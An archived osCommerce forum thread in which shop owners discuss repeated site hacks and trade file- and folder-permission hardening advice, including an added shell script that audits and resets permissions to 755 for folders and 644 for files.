Guest Posted November 16, 2007
Morning,
We have been building online shops with osCommerce for a couple of years now and never had any problems. Until this summer. Since summer, though, many of our shops have been attacked, some using the vulnerability of the 777 directories and other smaller vulnerabilities, which we have now fixed, but now we just had another one with an SQL injection. It seems like a never-ending attack at the moment: one thing fixed, another one attacked... Do others notice an increase in (successful) attacks, too? Or is it just me... I don't know what to do and where to start; has anyone had a similar situation?
Thank you,
Anuschka

Vger Posted November 16, 2007
No folder should have permissions higher than 755, because 777 is FULL permissions for everyone! However, some hosts have their servers set up so badly that you have to have permissions of 777 on folders for your site to work. The answer, if they won't correct that, is to find a new host! Saying that a site has been hacked when folders have permissions of 777 is like saying that your house was robbed when you left the back door wide open.
You should also be aware that many sites get hacked via an exploitation of the server. cPanel in particular is vulnerable to this sort of attack and gets exploited between 2 and 4 times a year, on average.
Vger

Guest Posted November 18, 2007
What was the second attack from? How did they exploit it?

Guest Posted November 18, 2007
> No folder should have permissions higher than 755, because 777 is FULL permissions for everyone! However, some hosts have their servers set up so badly that you have to have permissions of 777 on folders for your site to work. The answer, if they won't correct that, is to find a new host! Saying that a site has been hacked when folders have permissions of 777 is like saying that your house was robbed when you left the back door wide open. You should also be aware that many sites get hacked via an exploitation of the server. cPanel in particular is vulnerable to this sort of attack and gets exploited between 2 and 4 times a year, on average. Vger
Does that apply to the backups directory and the graphs directory?

Guest Posted November 18, 2007
Hi there, thank you for your replies. Our shop has just been hacked again. :( We didn't even have the settings set to 777 yet; they were on 755. As I am not the developer, I have just put an HTML page in front of it to hide it. If you want to see the hack (it seems to be a Turkish one this time), please PM me, as I don't want to cause my customer more trouble than he has already and publicise it to Google etc.
But if you have all directories set to 755, how do you get around allowing your customers to upload images to the directories, as Coopco is asking: "does this apply to the graph ones, too"? Anyway, the 777 doesn't seem to have been the problem, as that wasn't even done yet. The new version of the shop that we uploaded to amend the problem has been live for not even 4 weeks yet, and they already managed to get rid of the entire front page and say "this shop has been hacked by xyz".
Oh, and yes, we do use cPanel-based hosting. The second attack was the SQL injection; the first attack was just a few links that had been inserted onto all text-editor-based sites. Then there was another attack where someone had uploaded a malicious folder into the images folder, which seems to be our current problem.
Thanks,
Anuschka

Vger Posted November 18, 2007
If your folder permissions are 755 and your site got hacked, and you use cPanel, then you must get your host to upgrade their version of cPanel. It doesn't matter what security you apply to osCommerce if they are getting in via cPanel, and this does sound like a cPanel exploit.
Vger

Guest Posted November 19, 2007
Hi Vger, how do you know that it could be cPanel, and what do I need to look out for? I have another host that we are currently testing and I'd move to them straight away, but they also use cPanel. Are there any hosting companies you recommend for osCommerce? I just sent you a PM; I'd be interested in learning about getting the images directory to work with a 755 setting.
Thank you,
Anuschka

Guest Posted November 19, 2007
Another question: would it help if we added SSL to the entire site?
Anuschka

Guest Posted November 19, 2007
> Another question: would it help if we added SSL to the entire site? Anuschka
No.

Guest Posted November 19, 2007
How do I find out which hosting is most secure? We have not had many nice experiences with hosting companies: either they are too big and anonymous, or not within our customers' price range. How do I know that it is cPanel for sure, and not move host for the wrong reasons?
Thanks,
Anuschka

Guest Posted November 20, 2007
Hi, I've been using this hosting company for three years now and have had very few problems with them (a couple of downtime issues in three years). Their tech support is right on the ball, and they offer enough traffic and storage to meet any osCommerce site. Easy to use cPanel. The only thing is you have to add an extra IP to your account for the SSL, but it's cheap enough not to be a big deal. All the files that need to be protected on our site are set to 644 (which is 99% of our site) and we have no hack issues.

Guest Posted November 20, 2007
Hi Eyekandee, thank you very much for this. My client is in the UK though, and I need to keep the hosting there, too. I forgot to mention that, sorry! I found quite a few hosts in the US who are in line with what Vger suggests, but not that many in the UK. Maybe we're a bit behind on that here. :)
All the best,
Anuschka

Vger Posted November 20, 2007
> All the files that need to be protected on our site are set to 644
That's the correct setting for files, but what settings do your folders have, 755 or 777? Also, even 755 won't protect you from a cPanel hack.
Vger

zhexiang Posted November 21, 2007
So, all files must be set to 644? Gosh, most of my files are set to 755 by default. Should I change it? Or play by luck and hope no hacking will occur?

Vger Posted November 21, 2007
All files, except for the two configure.php files, should be set to 644. The two configure.php files should be set to either 644, 444 or 400; which setting is correct for those two files will depend on your hosting. You should not have any files set to 755 permissions (only folders).
Vger

Guest Posted November 27, 2007
> All files, except for the two configure.php files, should be set to 644. The two configure.php files should be set to either 644, 444 or 400; which setting is correct for those two files will depend on your hosting. You should not have any files set to 755 permissions (only folders). Vger
Hi, so I should set ALL FILES to 644 (in my case) except for configure.php. And all folders to 755? Thanks!

Jack_mcs Posted November 27, 2007
> Hi, so I should set ALL FILES to 644 (in my case) except for configure.php. And all folders to 755? Thanks!
On a properly set up server, all directories should be set to 755. All files should be set to 644, except for the configure files and some files added by some contributions.
Jack

zhexiang Posted November 28, 2007
Good... I'm gonna die on this one... too many files to change... See you all in the afterlife... LOL...

Jack_mcs Posted November 28, 2007
Depending on your control panel, there may be a way to change whole directories at one time. Or your host could do it very easily, if they will. It wouldn't hurt to ask.
Jack

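As an added illustration of the layout the thread settles on (folders 755, files 644, the two configure.php files 644, 444 or 400) and of Jack's "whole directories at one time" step, here is a shell script that audits a shop tree for deviations and repairs them in bulk with find. It is not code from the thread or from osCommerce; it assumes GNU find and chmod on a Linux host, and /path/to/catalog is a placeholder for the shop's own directory.

```shell
#!/bin/sh
# Added example (not from the thread or osCommerce itself): audit a shop tree
# against the agreed permission layout and optionally repair it in bulk.
# Assumes GNU find/chmod (Linux); the catalog path is whatever you pass in.
#   sh osc_perms.sh audit /path/to/catalog
#   sh osc_perms.sh fix   /path/to/catalog

# Print every path whose mode deviates from the expected layout.
# Returns 0 when the tree is clean, 1 when at least one finding was printed.
audit_perms() {
    root=$1
    findings=$(
        # folders: exactly 755 (777 would make them world-writable)
        find "$root" -type d ! -perm 755 | sed 's/^/dir not 755:  /'
        # ordinary files: exactly 644, never 755 or 777
        find "$root" -type f ! -name configure.php ! -perm 644 \
            | sed 's/^/file not 644: /'
        # the configure.php files: 644, 444 or 400 depending on the host
        find "$root" -type f -name configure.php \
            ! -perm 644 ! -perm 444 ! -perm 400 \
            | sed 's/^/configure.php not 644\/444\/400: /'
    )
    [ -z "$findings" ] && return 0
    printf '%s\n' "$findings"
    return 1
}

# Apply the layout to a whole tree at once. configure.php files that are
# already 644/444/400 are left alone; any other mode on them is reset to 644,
# the most permissive of the accepted values, so the shop keeps working and
# the admin can tighten it afterwards if the host allows 444 or 400.
fix_perms() {
    root=$1
    find "$root" -type d -exec chmod 755 {} +
    find "$root" -type f ! -name configure.php -exec chmod 644 {} +
    find "$root" -type f -name configure.php \
        ! -perm 644 ! -perm 444 ! -perm 400 -exec chmod 644 {} +
}

case ${1-} in
    audit) audit_perms "$2" ;;
    fix)   fix_perms "$2" ;;
esac
```

Run the audit first on a copy or a quiet shop; files a contribution deliberately set differently will show up as findings and need a conscious decision rather than a blanket chmod.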
Arctic Fox Posted November 30, 2007
If I set anything to 6## that 'thing' will disappear from my FTP. For me it all has to be 7## for me to get access to it, or I have to contact my host to bring it back into view.

valerif Posted December 11, 2007
> If I set anything to 6## that 'thing' will disappear from my FTP. For me it all has to be 7## for me to get access to it, or I have to contact my host to bring it back into view.
Hello, I wonder what permission the sessions folder should have?

sqldude Posted October 13, 2008
Just wanted to share a script that appeared in several of our pages yesterday that caused our osC shop to stop loading on computers with any kind of decent Internet protection software (i.e. Sophos and Norton Internet). It was partially our fault for not securing all of the directories and files, but we are not web admins and did not realize that our host's one-click install did not secure the folders/files. In fairness, they did point us to the exact file and folders that were not secured so we could correct that, but we had apparently already been injected at that point. So, the script that was injected had two variants:
We found one of these scripts on the following pages just under the <body></body> tags:
catalog/index.php
catalog/default.php
admin/index.php
index333.html
index3334.html
So far, osC seems to be running fine with all directories at 755 and files at 644. We also reset our FTP passwords.

Jan Zonjee Posted October 13, 2008
> Just wanted to share a script that appeared in several of our pages yesterday that caused our osC shop to stop loading on computers with any kind of decent Internet protection software
Looks familiar.

php_Guy Posted October 14, 2008
I don't see it mentioned yet, so I'll post a link... This thread lists all the security mods and discusses some of the issues. I'd recommend installing them all. Also be sure to .htpasswd protect your admin folder. Do not rely on the built-in password protection.
Security Mods
Good luck!

Guest Posted October 16, 2008
I have a great hosting provider, and there's no cPanel... a different one (don't want to say!). If you are interested in getting their name, PM me.

This topic is now archived and is closed to further replies.